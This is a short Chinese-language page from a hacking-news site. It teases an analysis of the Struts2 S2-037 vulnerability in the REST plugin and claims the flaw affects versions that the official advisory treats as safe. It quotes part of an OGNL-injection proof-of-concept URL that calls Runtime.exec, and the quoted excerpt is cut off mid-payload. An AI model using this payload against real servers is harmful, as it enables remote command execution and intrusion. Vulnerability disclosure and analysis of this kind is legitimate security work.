记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Struts2 最新漏洞S037分析!

AT: PKAV-香草 无声说安全 发现struts2又出了新漏洞S2-033 官方的的意思是说如果使用了REST插件并且开启了动态方法执行 但是经过研究发现,其实并不需要开启动态方法执行,因此可以通杀所有安装了REST的struts2,包括官方认为不存在漏洞的 Struts 2.3.20.3, 2.3.24.3 and 2.3.28.1 。官方认为的s033的POC是这样的: http://127.0.0.1:8888/struts2-rest-showcase/orders/3!%23_memberAccess%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,@java.lang.Runtime@getRuntime().exec(%23param
发布时间:2016-06-17 00:55 | 阅读:85053 | 评论:0 | 标签:JSP Others s037 Struts2 漏洞

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云